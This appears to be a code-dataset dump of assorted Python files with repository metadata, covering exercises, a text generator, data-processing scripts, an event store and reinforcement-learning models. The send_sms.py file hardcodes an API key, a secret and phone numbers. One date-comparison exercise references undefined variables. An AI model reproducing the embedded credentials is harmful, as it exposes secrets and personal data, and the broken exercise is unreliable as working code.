blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
โ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
โ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
โ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe08790f0a1ce9cb7efb4031c9bbf11adbbfcec9
|
6efdee46507c2f2d05e4986c963f189a1e754e9b
|
/ex15.py
|
048204e2129b9aea9b9230e4d635d3eca03a682d
|
[] |
no_license
|
SachinPitale/Python
|
b0d2d08f6f12bdce8a30ba9e9c370d3415721168
|
6889527b4b04e394feedcd6516e0298cccb6c5ee
|
refs/heads/master
| 2020-07-26T05:59:46.325528 | 2019-09-15T07:26:24 | 2019-09-15T07:26:24 | 208,557,473 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 246 |
py
|
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's your file %r :" %filename
print txt.read()
print "type the file name again "
file_again = raw_input("> ")
txt_again = open(file_again)
print txt_again.read()
|
[
"[email protected]"
] | |
689f182aaf2c3e12e5345b5f4029c3a84a26d873
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_unshakeable.py
|
e5580220c428d26267e79c308054751c325bd982
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 464 |
py
|
#calss header
class _UNSHAKEABLE():
def __init__(self,):
self.name = "UNSHAKEABLE"
self.definitions = [u"If someone's trust or belief is unshakeable, it is firm and cannot be made weaker or destroyed: "]
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
|
[
"[email protected]"
] | |
1fb2df762dd45f6aa9845f161da2ee0c3e55bf03
|
77f5a8d34aadc697e95671f1c9b17ca547e2b4c1
|
/xierpa3/contributions/filibuster/content/creditcard.py
|
3038f19db04632a24c976e6344a1a4cf9dd30217
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
dungmv56/Xierpa3
|
ef9f37a62a5b739e6e41f8bbe683820771a2f22e
|
1e5fecaee84204401f3cc7ccea10092cb31029bf
|
refs/heads/master
| 2020-12-24T11:17:31.945821 | 2016-02-25T11:39:08 | 2016-02-25T11:39:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,697 |
py
|
# -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# Contributed by Erik van Blokland and Jonathan Hoefler
# Original from filibuster.
#
# FILIBUSTER.ORG!
"""
living
--------------------------------------------------------------------
"""
__version__ = '3.0.0'
__author__ = "someone"
content = {
'creditcard': [
'<#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_flavor#><#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_quality#> <#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_quality#> <#p_cc_flavor#><#p_cc_sx#>',
],
'creditcard_accepted': [
'<#company#> welcomes <#creditcard#>',
'<#company#> prefers <#creditcard#>',
'We welcome <#creditcard#>',
'We prefer <#creditcard#>',
'<#creditcard#> preferred!',
'<#creditcard#> accepted.',
'Pay with <#creditcard#>',
],
'creditcard_issued': [
'<#p_cc_issuer#> <#creditcard#>',
u'<#p_cc_issuer#>โs <#creditcard#>',
'<#creditcard#>, by <#p_cc_issuer#>',
],
'creditcard_number': [
'<#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#>',
],
'creditcard_validuntil': [
'<#time_months#> <#time_comingyears#>',
],
'p_acronym': [
'<#alphabet_caps#><#alphabet_caps#>',
'<#alphabet_caps#><#alphabet_caps#><#alphabet_caps#>',
],
'p_cc_flavor': [
'<#p_cc_flavor_common#>',
'<#p_cc_flavor_nonsense#>',
'<#name_japanese#>',
'<#p_cc_flavor_religious#>',
'<#p_cc_flavor_super#>',
'<#p_cc_flavor_count#>',
'<#p_cc_flavor_sweet#>',
'<#p_cc_flavor_shop#>',
'<#p_cc_flavor_money#>',
'<#p_cc_flavor_modern#>',
'<#p_cc_flavor_currency#>',
'<#p_cc_flavor_locale#>',
'<#p_cc_flavor_odd#>',
'<#p_cc_flavor_others#>',
],
'p_cc_flavor_common': [
'Direct',
'Media',
'Uni',
'Family',
'Member',
'Diner',
],
'p_cc_flavor_count': [
'Twin',
'Bi',
'Duo',
'Tri',
'Trio',
'Quatro',
'Penta',
],
'p_cc_flavor_currency': [
'Dime',
'<#sci_transition_metals#>Dollar',
'Dollar',
'Sterling',
'Change',
],
'p_cc_flavor_locale': [
'Euro',
'Asia',
'US',
'HK',
],
'p_cc_flavor_modern': [
'Com',
'Phone',
'Smart',
'Swipe',
'Compu',
'Terminal',
'Electro',
'Plasti',
'Chem',
'Chemi',
'Chemo',
'Net',
'Web',
'SET',
'Inter',
],
'p_cc_flavor_money': [
'Buy',
'Cash',
'Kash',
'Money',
'Pecunia',
'Debet',
'Debt',
'Specu',
'Pin',
'Chipper',
],
'p_cc_flavor_nonsense': [
'Exi',
'Minto',
'Exo',
'Mondo',
'Fina',
],
'p_cc_flavor_odd': [
'Gas',
'Petro',
'Petroli',
],
'p_cc_flavor_others': [
'<#p_acronym#>',
'<#p_co_creative#>',
'<#p_co_mediaprefix#>',
'<#p_business_name#>',
'<#p_cc_quality#>',
],
'p_cc_flavor_religious': [
'Pure',
'Reli',
'Holy',
'Spiri',
'God',
'Noble',
],
'p_cc_flavor_shop': [
'Excel',
'Access',
'XS',
'Fast',
'Digi',
'E',
'Shop',
'Store',
'Market',
],
'p_cc_flavor_super': [
'Super',
'Hyper',
'Ultra',
'Kid',
'Major',
'Minor',
],
'p_cc_flavor_sweet': [
'Courtesy',
'Polite',
'Nice',
'Comfort',
'Friendly',
'Friendli',
],
'p_cc_issuer': [
'<#company#>',
'<#eurobank#>',
'<#usbank#>',
'<#name_japanese#>',
],
'p_cc_quality': [
'Personal',
'Home',
'Business',
'Corporate',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
],
'p_cc_sx': [
'Card',
'Card',
'Card',
'Card',
'Credit',
'Express',
],
}
|
[
"[email protected]"
] | |
de8214dd5f2792bdca5eccdda107e72222c30130
|
58115fa94a81b02a8b194fe7f1c1cd4ff996df97
|
/src/anyconfig/schema/__init__.py
|
1437437066cf8b3c7b6580abe489d66ce4816ad7
|
[
"MIT"
] |
permissive
|
Terrance-forks/python-anyconfig
|
9f77de334c162e1c2334a749c29f63bd0294a09b
|
21d7c0e30287569b394972557b5a54fab03bcd5c
|
refs/heads/master
| 2021-06-19T09:11:18.697637 | 2021-05-17T04:35:10 | 2021-05-17T04:35:10 | 202,930,334 | 0 | 0 |
MIT
| 2019-08-17T20:52:23 | 2019-08-17T20:52:22 | null |
UTF-8
|
Python
| false | false | 451 |
py
|
#
# Copyright (C) 2021 Satoru SATOH <[email protected]>
# SPDX-License-Identifier: MIT
#
r"""misc global constants, variables, classes and so on.
"""
try:
from .jsonschema import validate, is_valid, gen_schema
SUPPORTED: bool = True
except ImportError:
from .default import validate, is_valid, gen_schema
SUPPORTED = False # type: ignore
__all__ = [
'validate', 'is_valid', 'gen_schema', 'SUPPORTED'
]
# vim:sw=4:ts=4:et:
|
[
"[email protected]"
] | |
98730ea9cabba62f347e29709bcad21695798feb
|
b6dce5523115d7e51ce1c5bf11ca963f9a17f04c
|
/shift/utils/timer.py
|
4be249aeb97ad182f8bf6179f4a88b92a227a55e
|
[
"MIT"
] |
permissive
|
fyabc/Py2016
|
1fcb345df6bcd89348686e13337158aa4325a8e0
|
a7e2b4ad11c96be97107821defef379d6e6f7595
|
refs/heads/master
| 2020-12-29T02:37:17.580568 | 2017-02-27T16:18:02 | 2017-02-27T16:18:02 | 54,388,415 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,084 |
py
|
# -*- coding: utf-8 -*-
__author__ = 'fyabc'
import pygame
import time
class ShiftTimer:
"""The Timer of this game. Copied from pgu.timer.
This is a singleton class. Do NOT have two ShiftTimer object at the same time.
"""
# The game time when one of the clock parameters was last changed
lastGameTime = None
# The real time corresponding to the last game time
lastRealTime = None
# The game time when 'tick' was last called
lastTickTime = None
# Whether the timer is paused or not
paused = False
# When this clock was created
startTime = None
# The speed which this clock moves at relative to the real clock
speed = 1
def __init__(self):
self.lastGameTime = 0
self.lastTickTime = 0
self.lastRealTime = time.time()
self.startTime = time.time()
# Set the rate at which this clock ticks relative to the real clock
def set_speed(self, n):
assert (n >= 0)
self.lastGameTime = self.getTime()
self.lastRealTime = time.time()
self.speed = n
# Pause the clock
def pause(self):
if not self.paused:
self.lastGameTime = self.getTime()
self.lastRealTime = time.time()
self.paused = True
# Resume the clock
def resume(self):
if self.paused:
self.paused = False
self.lastRealTime = time.time()
def tick(self, fps=0):
tm = self.getTime()
dt = tm - self.lastTickTime
if fps > 0:
minTime = 1.0 / fps
if dt < minTime:
pygame.time.wait(int((minTime - dt) * 1000))
dt = minTime
self.lastTickTime = tm
return dt
# Returns the amount of 'game time' that has passed since creating
# the clock (paused time does not count).
def getTime(self):
if self.paused:
return self.lastGameTime
return self.speed * (time.time() - self.lastRealTime) + self.lastGameTime
def getRealTime(self):
return time.time() - self.startTime
|
[
"[email protected]"
] | |
2db6b9d03d9ffa6ad05fa7db612b7e2db5364dd6
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/merra_scripts/02_preprocessing/merraLagScripts/443-tideGauge.py
|
1cfa0de339d2f9659ec80f2176dd2e40a6ad8413
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,772 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
# dir_name = 'F:\\01_erainterim\\03_eraint_lagged_predictors\\eraint_D3'
dir_in = "/lustre/fs0/home/mtadesse/merraAllCombined"
dir_out = "/lustre/fs0/home/mtadesse/merraAllLagged"
def lag():
os.chdir(dir_in)
#get names
tg_list_name = sorted(os.listdir())
x = 443
y = 444
for tg in range(x, y):
os.chdir(dir_in)
tg_name = tg_list_name[tg]
print(tg_name, '\n')
pred = pd.read_csv(tg_name)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since MERRA has 3hrly data
#the lag_hrs is increased from 6(eraint) to 31(MERRA)
time_lagged = pd.DataFrame()
lag_hrs = list(range(0, 31))
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
#datafrmae that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
#merge the selected tlagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
|
[
"[email protected]"
] | |
64411eeed18edf4d09de5cf319c24119d1bea4e2
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/lag82/443-tideGauge.py
|
00c7b277a09c1bb696c020bb8ff48ee0b7724626
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,984 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 443
y = 444
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
# #check if the file exists
# os.chdir(dir_out)
# if (os.path.isfile(tg_name)):
# print('file already exists')
# continue
#cd to where the actual file is
os.chdir(dir_in)
pred = pd.read_csv(tg_name)
pred.sort_values(by = 'date', inplace=True)
pred.reset_index(inplace = True)
pred.drop('index', axis = 1, inplace = True)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since ERA20C has 3hrly data
#the lag_hrs is increased from 6(eraint) to 11 (era20C)
time_lagged = pd.DataFrame()
lag_hrs = [0, 6, 12, 18, 24, 30]
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
#datafrmae that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
#merge the selected tlagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
|
[
"[email protected]"
] | |
f5c65c37b451bb7845cec225a79a12aa20bfce04
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/KPicBthv6WhHFGapg_17.py
|
7aa3aa5f1a8fb508597b2d6bcee51885d1d6d0bd
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 595 |
py
|
"""
Create a function that returns the **number of syllables** in a simple string.
The string is made up of _short repeated words_ like `"Lalalalalalala"` (which
would have _7 syllables_ ).
### Examples
count_syllables("Hehehehehehe") โ 6
count_syllables("bobobobobobobobo") โ 8
count_syllables("NANANA") โ 3
### Notes
* For simplicity, please note that each syllable will consist of two letters only.
* Your code should accept strings of any case (upper, lower and mixed case).
"""
def count_syllables(txt):
t = txt.lower()
return t.count(t[0:2])
|
[
"[email protected]"
] | |
f066cea6f931f46a65d678f695ba5d46150afd2f
|
75402b6c851a12ae41359fdd83e89d2160c308af
|
/zentral/core/stores/backends/kinesis.py
|
a5c04ab974baab80ac23fec6e49719b18ff53a28
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-commercial-license"
] |
permissive
|
neocode12/zentral
|
7b05aeeb823a5a3d7d268cc2b01e0bf1a5e4be71
|
9ecc8d8334148627fcccaa875f100adacd7a018b
|
refs/heads/main
| 2023-04-09T12:06:45.355559 | 2023-03-15T14:05:05 | 2023-03-15T14:05:05 | 327,651,549 | 0 | 0 |
Apache-2.0
| 2021-01-07T15:30:00 | 2021-01-07T15:30:00 | null |
UTF-8
|
Python
| false | false | 4,096 |
py
|
import logging
import boto3
from kombu.utils import json
from zentral.core.exceptions import ImproperlyConfigured
from zentral.core.stores.backends.base import BaseEventStore
from zentral.utils.boto3 import make_refreshable_assume_role_session
logger = logging.getLogger('zentral.core.stores.backends.kinesis')
class EventStore(BaseEventStore):
max_batch_size = 500
def __init__(self, config_d):
super(EventStore, self).__init__(config_d)
self.stream = config_d["stream"]
self.region_name = config_d["region_name"]
self.credentials = {}
for k in ("aws_access_key_id", "aws_secret_access_key"):
v = config_d.get(k)
if v:
self.credentials[k] = v
self.assume_role_arn = config_d.get("assume_role_arn")
self.serialization_format = config_d.get("serialization_format", "zentral")
if self.serialization_format not in ("zentral", "firehose_v1"):
raise ImproperlyConfigured("Unknown serialization format")
def wait_and_configure(self):
session = boto3.Session(**self.credentials)
if self.assume_role_arn:
logger.info("Assume role %s", self.assume_role_arn)
session = make_refreshable_assume_role_session(
session,
{"RoleArn": self.assume_role_arn,
"RoleSessionName": "ZentralStoreKinesis"}
)
self.client = session.client('kinesis', region_name=self.region_name)
self.configured = True
def _serialize_event(self, event):
if not isinstance(event, dict):
event_d = event.serialize()
else:
event_d = event
event_id = event_d['_zentral']['id']
event_index = event_d['_zentral']['index']
partition_key = f"{event_id}{event_index}"
if self.serialization_format == "firehose_v1":
metadata = event_d.pop("_zentral")
event_type = metadata.pop("type")
created_at = metadata.pop("created_at")
tags = metadata.pop("tags", [])
objects = metadata.pop("objects", {})
serial_number = metadata.pop("machine_serial_number", None)
event_d = {
"type": event_type,
"created_at": created_at,
"tags": tags,
"probes": [probe_d["pk"] for probe_d in metadata.get("probes", [])],
"objects": [f"{k}:{v}" for k in objects for v in objects[k]],
"metadata": json.dumps(metadata),
"payload": json.dumps(event_d),
"serial_number": serial_number
}
return json.dumps(event_d).encode("utf-8"), partition_key, event_id, event_index
def store(self, event):
self.wait_and_configure_if_necessary()
data, partition_key, _, _ = self._serialize_event(event)
return self.client.put_record(StreamName=self.stream,
Data=data,
PartitionKey=partition_key)
def bulk_store(self, events):
self.wait_and_configure_if_necessary()
if self.batch_size < 2:
raise RuntimeError("bulk_store is not available when batch_size < 2")
event_keys = []
records = []
for event in events:
data, partition_key, event_id, event_index = self._serialize_event(event)
event_keys.append((event_id, event_index))
records.append({'Data': data, 'PartitionKey': partition_key})
if not records:
return
response = self.client.put_records(Records=records, StreamName=self.stream)
failed_record_count = response.get("FailedRecordCount", 0)
if failed_record_count == 0:
# shortcut
yield from event_keys
return
logger.warning("%s failed record(s)", failed_record_count)
for key, record in zip(event_keys, response.get("Records", [])):
if record.get("SequenceNumber") and record.get("ShardId"):
yield key
|
[
"[email protected]"
] | |
af646b7ff78e8c9fcdc8fbc2cb08695b04778a24
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/127/usersdata/218/35224/submittedfiles/ex11.py
|
4cdc5c3d13ba6d1d5401867a17bcaa65083f3520
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 543 |
py
|
# -*- coding: utf-8 -*-
D1=int(input('digite o dia da data 1:'))
D2=int(input('digite o dia da data 2:'))
M1=int(input('digite o mรชs da data 1:'))
M2=int(input('digite o mรชs da data 2:'))
A1=int(input('digite o ano da data 1:'))
A2=int(input('digite o ano da data 2:'))
if A1>A2:
print(data1)
elif A2>A1:
print(data2)
else:
if M1>M2:
print(data1)
elif M2>M1:
print(data2)
else:
if D1>D2:
print(data1)
elif D2>D1:
print(data2)
else:
print(iguais)
|
[
"[email protected]"
] | |
0fc2541411dcb465d061d206bdbd4ed4a27b5913
|
ea97a6d0d5ffc5ec2730b63a20b1f4de0bd8112d
|
/scurgen/test/axes_demo.py
|
a74c934af8fb6965cae2a134495e19057c3db58d
|
[] |
no_license
|
daler/scurgen
|
35d5ee35243a41b75c444f5bb71380ba80ba72c6
|
ca0e4f30e9573684b90a8123e31982490b5fe473
|
refs/heads/master
| 2020-12-24T19:18:19.587609 | 2013-03-11T16:35:33 | 2013-03-11T16:35:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,375 |
py
|
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.gridspec as gs
import numpy as np
fig = plt.figure(figsize=(10,10))
nchroms = 21
nrows = int(np.round(np.sqrt(nchroms)))
ncols = nrows
nfiles = 3
CHROM = dict(
left= 0.05,
right=0.8,
top=0.9,
bottom=0.2,
wspace=0.1,
hspace=0.1)
SLIDER_PAD = 0.01
SLIDER = dict(
left=CHROM['left'],
right=CHROM['right'],
bottom=0.1,
top=CHROM['bottom'] - SLIDER_PAD,
hspace=0.5,
)
CBAR_PAD = 0.01
CBAR = dict(
left=CHROM['right'] + CBAR_PAD,
right=0.9,
wspace=SLIDER['hspace'],
top=CHROM['top'],
bottom=CHROM['bottom'],
)
CHECKS = dict(
top=SLIDER['top'],
bottom=SLIDER['bottom'],
left=SLIDER['right'] + CBAR_PAD,
right=CBAR['right'],
wspace=CBAR['wspace'],
hspace=SLIDER['hspace'])
chroms = gs.GridSpec(nrows, ncols)
chroms.update(**CHROM)
axs1 = [plt.subplot(i) for i in chroms]
sliders = gs.GridSpec(nfiles, 1)
sliders.update(**SLIDER)
axs2 = [plt.subplot(i) for i in sliders]
colorbars = gs.GridSpec(1, nfiles)
colorbars.update(**CBAR)
axs3 = [plt.subplot(i) for i in colorbars]
checks = gs.GridSpec(nfiles, nfiles)
checks.update(**CHECKS)
axs4 = [plt.subplot(checks[i, i]) for i in range(nfiles)]
for ax in axs2 + axs4:
ax.set_xticks([])
ax.set_yticks([])
plt.show()
|
[
"[email protected]"
] | |
6fbab4480a4dbe295810065fd70027aba431136e
|
65fcf07ea6d6dfe0c5a4090343b098807e075010
|
/app/send_sms.py
|
ddf1616e9f2939a4869869007f444ac64bf91988
|
[] |
no_license
|
parkhongbeen/study_selenium
|
0e7e0bc23809c57c29d5352e2ee81b9a74060026
|
f1bdfd3c3aa3299791cc53363eea0a811c6dcedc
|
refs/heads/master
| 2021-04-20T11:27:39.522904 | 2020-03-26T12:54:59 | 2020-03-26T12:54:59 | 249,679,396 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 381 |
py
|
from sdk.api.message import Message
api_key = "NCSGLMHSQ2FTVZUA"
api_secret = "LCSOKSWPDNLZF971PMZ4XAQPZPYD60EW"
params = dict()
params['type'] = 'sms'
params['to'] = '01082128997'
params['from'] = '01050022354'
params['text'] = '์ผ ํ๋น์ ๋ด๊ฐ ๋ด์ผ ์ปคํผ์ฌ์ค๊ป'
cool = Message(api_key, api_secret)
try:
response = cool.send(params)
except:
print('์๋ฌ')
|
[
"[email protected]"
] | |
7734622e41048306a547129450508bf4c50e9f13
|
094627e84a63cdeb97c8917cc6581cc55fa8f583
|
/brl_baselines/deepq/models.py
|
4309da5e793c8494de2fd8a12a042c7a978427f7
|
[
"BSD-3-Clause"
] |
permissive
|
gilwoolee/brl_baselines
|
844f23b31f53648796325d13cb3c252cda0fc55d
|
c85df28c0f2dfbd69d3d27928bcbabf36a3663bb
|
refs/heads/master
| 2022-11-28T22:31:31.195138 | 2020-08-04T02:17:28 | 2020-08-04T02:17:28 | 278,916,753 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,059 |
py
|
import tensorflow as tf
import tensorflow.contrib.layers as layers
def _mlp(hiddens, input_, num_actions, scope, reuse=False, layer_norm=False):
with tf.variable_scope(scope, reuse=reuse):
out = input_
for hidden in hiddens:
out = layers.fully_connected(out, num_outputs=hidden, activation_fn=None)
if layer_norm:
out = layers.layer_norm(out, center=True, scale=True)
out = tf.nn.relu(out)
q_out = layers.fully_connected(out, num_outputs=num_actions, activation_fn=None)
return q_out
def mlp(hiddens=[], layer_norm=False):
"""This model takes as input an observation and returns values of all actions.
Parameters
----------
hiddens: [int]
list of sizes of hidden layers
layer_norm: bool
if true applies layer normalization for every layer
as described in https://arxiv.org/abs/1607.06450
Returns
-------
q_func: function
q_function for DQN algorithm.
"""
return lambda *args, **kwargs: _mlp(hiddens, layer_norm=layer_norm, *args, **kwargs)
def _cnn_to_mlp(convs, hiddens, dueling, input_, num_actions, scope, reuse=False, layer_norm=False):
with tf.variable_scope(scope, reuse=reuse):
out = input_
with tf.variable_scope("convnet"):
for num_outputs, kernel_size, stride in convs:
out = layers.convolution2d(out,
num_outputs=num_outputs,
kernel_size=kernel_size,
stride=stride,
activation_fn=tf.nn.relu)
conv_out = layers.flatten(out)
with tf.variable_scope("action_value"):
action_out = conv_out
for hidden in hiddens:
action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)
if layer_norm:
action_out = layers.layer_norm(action_out, center=True, scale=True)
action_out = tf.nn.relu(action_out)
action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)
if dueling:
with tf.variable_scope("state_value"):
state_out = conv_out
for hidden in hiddens:
state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)
if layer_norm:
state_out = layers.layer_norm(state_out, center=True, scale=True)
state_out = tf.nn.relu(state_out)
state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)
action_scores_mean = tf.reduce_mean(action_scores, 1)
action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)
q_out = state_score + action_scores_centered
else:
q_out = action_scores
return q_out
def cnn_to_mlp(convs, hiddens, dueling=False, layer_norm=False):
"""This model takes as input an observation and returns values of all actions.
Parameters
----------
convs: [(int, int, int)]
list of convolutional layers in form of
(num_outputs, kernel_size, stride)
hiddens: [int]
list of sizes of hidden layers
dueling: bool
if true double the output MLP to compute a baseline
for action scores
layer_norm: bool
if true applies layer normalization for every layer
as described in https://arxiv.org/abs/1607.06450
Returns
-------
q_func: function
q_function for DQN algorithm.
"""
